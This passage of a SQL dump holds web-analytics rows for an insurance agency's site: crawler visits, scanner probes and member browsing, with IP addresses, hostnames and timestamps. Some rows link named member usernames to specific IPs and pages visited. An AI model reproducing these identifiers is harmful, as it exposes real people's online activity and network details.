+http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23387,'0b_6be5b4769f1c514fbf727fced5928a90','1462167689','66.249.64.241','crawl-66-249-64-241.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(23390,'0b_c9fecbc89cd57e30a96d6f852e4fcaef','1462167694','66.249.64.160','crawl-66-249-64-160.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(23393,'0b_74c057bc8a4f6afe2edf89f553c914db','1462169913','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23394,'0b_74c057bc8a4f6afe2edf89f553c914db','1462169916','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23396,'0b_c3034aab9fb6bb521decf094552528ee','1462172651','204.79.180.238','204.79.180.238','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)','','',0,'WinVista','IE 9','us','','','','','','','0','0',0),(23399,'0b_c3034aab9fb6bb521decf094552528ee','1462172668','204.79.180.249','204.79.180.249','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)','http://www.empireins.com/','',0,'WinVista','IE 9','us','','','','','','','0','0',0),(23400,'0b_19de2316177982600e9384d357c6ff0e','1462175346','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23402,'0b_21c901f7d5f44d3ebd6b6ca7c8997cbc','1462176636','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23403,'0b_ebc33cc625cb9024161d224945780483','1462182433','68.180.230.123','b115363.yse.yahoo.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(23406,'0b_55f8b948786073e72487611837ca3212','1462192897','95.28.174.52','95-28-174-52.broadband.corbina.ru','/agent-tools/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 YaBrowser/13.10.1500.9323 Safari/537.36','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1042.cg6c2BzW5L10Di_XO9HHYdO1axwDrN7OSl7HUMfWUSOtYHZhHKXswh2J321MIwNr.dce7c9b2f937c8ae2b023d5ba152d1c412a34a55&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW9J0KiE5XNXd0dp0ZMwFHoviUoYa6nzP7MFsomsouu4qcVFqW_yOtSJHU6h9YDEB1vH_iYvTxcsUJuOB0o8S7cbWZh9b4rOMIZ0mxYDz7CUHumsq8IntqZwHIROZwlYEgQOJMpy9T0IdQVyLyj9yPolUaDyzL1hcoZj0PKjS08FbTVaxm0O8B4SA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxanJHSFhXak9Sei1wb0JZNnQ1Y0dPdThsRE5FR2pMQkxSTTA0Mmd5c1JTZ0oyTENXYXg1ZEZ6UnA3Ni16cU1WeFpkNmtHbzJXQU5aenEtazhGdlp6THBvVHVBNXEzNldmcVFOWUxkd1ZLTDM&b64e=2&sign=fc3c855ac554e8a9530907b5f0895166&keyno=0&l10n=ru&cts=1462192488581&mc=7.46671930487','',0,'Win7','YaBrowser 13','ru','','','','','','','0','0',0),(23409,'0b_b8aecf339221e3363ad3f7efcd1b28fa','1462192897','176.77.47.77','ip-176-77-47-77.bb.netbynet.ru','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1501.105 Safari/537.36 MRCHROME SOC','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1042.3z02-mCotAfvFfy7AanUkSNdcnBaK2XiqcG-XMWFcs5qUWqBZaC1qYBzCimms8Hc.985678ea28c09144716eec6c3b3a0c938e0f822b&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW9J0KiE5XNXd0dp0ZMwFHoviUoYa6nzP7MSi3gOS8hVmLxrob5JrCTbXR9uk_8eoFNT5gxJ3H4KPm0V6rz0m__9z04oDDSzvrCuNo9rrHr6EmjgD56-9WoRhEQZUQnOI3LwO59bM6Epjm-mnox9xKXh35GvwigbUqR26liLSxoaKUWNtZQPayehw&data=UlNrNmk5WktYejR0eWJFYk1LdmtxanJHSFhXak9Sei1wb0JZNnQ1Y0dPdVN3dF9YOXRlUmJhemFZQmtmMENJZ2RBT2dIaDlXR29kY3daZGJnTmtvXzVrOWR2bklJOXRSY2FXaC1YYkNoYm81WkVucjBPRHJTekhSb29jd3kwUFNfWUhWRmZEZXN2MA&b64e=2&sign=7be15d49dde9bc9d078347e885ea93fd&keyno=0&l10n=ru&cts=1462192488581&mc=1.59744878972','',0,'Win7','Google Chrome','ru','','','','','','','0','0',0),(23412,'0b_b88e89141c796accea787b1192fb9196','1462193363','180.76.15.12','baiduspider-180-76-15-12.crawl.baidu.com','/insentives/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(23414,'0b_62e86db94afd46a857ec1937eab235af','1462194819','88.198.22.8','static.88-198-22-8.clients.your-server.de','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3; MALNJS)','','',0,'Win8 x64','IE 10','de','','','','','','','0','0',0),(23417,'0b_12b7cf53e6c37bd8c9b72a8524121466','1462194927','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23420,'0b_12b7cf53e6c37bd8c9b72a8524121466','1462194929','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23423,'0b_fcdd7c8f77f7496537ea47ea56391801','1462195766','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(23424,'0b_d9695c392b40afdac65a20f597c71df1','1462197623','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(23427,'0b_d9695c392b40afdac65a20f597c71df1','1462197688','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(23429,'0b_d9695c392b40afdac65a20f597c71df1','1462197765','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(23430,'0b_eda0bb5a8a7fdae1ba3e657af76f9588','1462197991','23.254.209.235','client-23-254-209-235.hostwindsdns.com','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','http://EMPIREINS.com','',0,'WinXP','Opera 8','','','','','','','','0','0',0),(23433,'0b_d9695c392b40afdac65a20f597c71df1','1462198139','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(23435,'0b_d9695c392b40afdac65a20f597c71df1','1462198144','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(23438,'0b_fa9a2c6900f63a6a002e4d30afaa6342','1462198176','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(23439,'0b_5fea2c6844a2d957b8329d219448e56d','1462198359','66.249.64.251','crawl-66-249-64-251.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(23441,'0b_7f5edd0a9d23d331491ca9529db00348','1462198360','66.249.64.160','crawl-66-249-64-160.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23442,'0b_3ac8fe1a11332f8191324691d2233377','1462200567','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729; InfoPath.2)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(23444,'0b_3ac8fe1a11332f8191324691d2233377','1462200579','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(23447,'0b_cb369c78090470286653b4b2c447d096','1462200779','65.181.120.179','mtz1.mtz1.cu.cc','/','AdnormCrawler www.adnorm.com/crawler','','',0,'','','cc','','','AdnormCrawler','','','','0','0',0),(23448,'0b_0b2167832a5a17bc73e9074ccc327ea6','1462201525','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(23450,'0b_0b2167832a5a17bc73e9074ccc327ea6','1462201529','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(23451,'0b_0b2167832a5a17bc73e9074ccc327ea6','1462201531','184.154.36.163','scan21.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(23454,'0b_0b2167832a5a17bc73e9074ccc327ea6','1462201533','184.154.36.163','scan21.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(23456,'0b_7a77f6085ae3d65c5c4a9c4b7f2f934f','1462201568','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(23457,'0b_7a77f6085ae3d65c5c4a9c4b7f2f934f','1462201570','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(23460,'0b_9d7db6a88fd72428ce23ca07f3ad8f20','1462203178','91.206.200.47','web106.ukraine.com.ua','/magazine/js/mage/cookies.js','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','empireins.com/magazine','',0,'WinXP','Chrome 5','ua','','','','','','','3','0',0),(23463,'0b_f7676a3a6a319845113a8185256ab9a1','1462203971','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(23465,'0b_552ceff58ee080dc35f464029fe781d5','1462204931','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23466,'0b_7f7d109df398223df33ef2b446e4b211','1462205696','52.200.99.88','ec2-52-200-99-88.compute-1.amazonaws.com','/robots.txt','btcrawler','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23468,'0b_7f7d109df398223df33ef2b446e4b211','1462205697','52.200.99.88','ec2-52-200-99-88.compute-1.amazonaws.com','/contact/','btcrawler','','',0,'','','us','','','','','','','0','0',0),(23471,'0b_861c3beb11313b8124ac85a0e3711467','1462205697','52.201.159.209','ec2-52-201-159-209.compute-1.amazonaws.com','/about-us/','btcrawler','','',0,'','','us','','','','','','','0','0',0),(23472,'0b_a14b3cbc924eece54c2eef4109a943de','1462205925','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(23475,'0b_7e3de40cb891941654f5bacff7d1d204','1462206032','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23477,'0b_ab93baf71454dea19454aafb032eae98','1462206273','178.162.205.22','178.162.205.22','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','','','','Unknown Spider','','','','0','0',0),(23480,'0b_a76c0873abe44ea6913acb091924cacc','1462207008','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(23483,'0b_a76c0873abe44ea6913acb091924cacc','1462207012','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23484,'0b_a76c0873abe44ea6913acb091924cacc','1462207020','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(23487,'0b_554e1d407aa4ccd8bc0d2729e3dcc922','1462207661','67.86.154.190','ool-43569abe.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','0',0),(23490,'0b_6f44177ec99effcdd708b4864a33f0ff','1462207745','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23493,'0b_6f44177ec99effcdd708b4864a33f0ff','1462207746','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23495,'0b_54df27cf55e170abe8988c650df6abd5','1462208467','180.76.15.21','baiduspider-180-76-15-21.crawl.baidu.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(23496,'0b_a9b2ce740141409f9f9bdaa1a588cc70','1462208544','66.249.83.147,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(23499,'0b_3e83e868a2e3a6fd49fdfab8d72a4cd4','1462208770','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23502,'0b_77014858399b70ae75cff0c3ec06fc5d','1462210253','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23505,'0b_77014858399b70ae75cff0c3ec06fc5d','1462210265','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23507,'0b_77014858399b70ae75cff0c3ec06fc5d','1462210280','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23510,'0b_77014858399b70ae75cff0c3ec06fc5d','1462210338','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(23511,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462210633','67.83.100.17','ool-43536411.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(23514,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462210634','67.83.100.17','ool-43536411.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(23516,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462210645','67.83.100.17','ool-43536411.dyn.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(23517,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462210728','67.83.100.17','ool-43536411.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(23520,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462210798','67.83.100.17','ool-43536411.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(23523,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462210892','67.83.100.17','ool-43536411.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(23525,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462210989','67.83.100.17','ool-43536411.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(23526,'0b_52dac9d1f88f1d0dced7ebc22e104548','1462211015','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23528,'0b_52dac9d1f88f1d0dced7ebc22e104548','1462211017','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23529,'0b_52dac9d1f88f1d0dced7ebc22e104548','1462211029','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(23531,'0b_82a6da4d9b09ade55bf6442ae9da0295','1462211035','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]','http://lover.ru/','',0,'Win2000','Opera 7','ua','','','','','','','0','0',0),(23534,'0b_82a6da4d9b09ade55bf6442ae9da0295','1462211035','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]','http://ru-z.ru/','',0,'Win2000','Opera 7','ua','','','','','','','0','0',0),(23537,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211049','67.83.100.17','ool-43536411.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(23538,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211050','67.83.100.17','ool-43536411.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(23540,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211053','67.83.100.17','ool-43536411.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(23541,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211084','67.83.100.17','ool-43536411.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','isaacjacob','','0','51',0),(23543,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211227','67.83.100.17','ool-43536411.dyn.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','isaacjacob','','0','51',0),(23544,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211237','67.83.100.17','ool-43536411.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','isaacjacob','','0','51',0),(23547,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211238','67.83.100.17','ool-43536411.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','isaacjacob','','0','0',0),(23549,'0b_5d7cf9fa5db8d82b439a024f1fadb4da','1462211251','67.83.100.17','ool-43536411.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','isaacjacob','','0','51',0),(23552,'0b_20aeec35a10cf71cae1142f6acd8cd17','1462211561','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(23555,'0b_20aeec35a10cf71cae1142f6acd8cd17','1462211562','68.180.230.123','b115363.yse.yahoo.net','/?p=290','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(23556,'0b_3cb138bbb1f3ebcec9b1c66687fa0051','1462211682','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23558,'0b_b831db90fd640dc7027c7e9198a91649','1462212982','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(23561,'0b_0f2e5c6b0c4db3c4c4adca62134fc6d3','1462213149','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23564,'0b_0f2e5c6b0c4db3c4c4adca62134fc6d3','1462213151','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(23567,'0b_2c642804247e2f21cee53624fc0803bc','1462213301','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 